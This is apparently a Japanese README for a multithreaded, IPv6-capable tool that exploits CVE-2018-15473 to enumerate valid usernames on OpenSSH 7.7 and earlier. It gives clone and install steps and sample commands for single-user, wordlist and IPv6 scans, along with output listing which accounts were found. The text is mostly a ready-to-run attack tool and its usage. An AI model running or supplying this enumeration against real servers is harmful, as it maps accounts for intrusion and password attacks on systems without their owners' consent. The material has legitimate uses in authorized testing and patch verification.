
マルチスレッド、IPv6対応、CVE-2018-15473を用いたワードリスト/シングルユーザーのユーザー名列挙
OpenSSH 7.7 以前のバージョンは、無効な認証ユーザーに対するベイルアウトを、リクエストを含むパケットが完全に解析されるまで遅延しないため、ユーザー列挙の脆弱性があります。これは auth2-gss.c、auth2-hostbased.c、auth2-pubkey.c に関連しています。
お使いのディストリビューションに相当する openssl-dev パッケージをインストールする必要があるかもしれません。
# 注意: Kali にインストールする場合、pip install はスキップできます。paramiko はすでに存在します。
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - または -
pipenv install -r requirements.txt # クールな人はこちら
chmod u+x ssh-username-enum.py
単一のユーザー名
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
10 スレッド(デフォルトは 4)でワードリストを使用
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
ポート 2222 の IPv6 アドレス、さらに詳細な出力!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------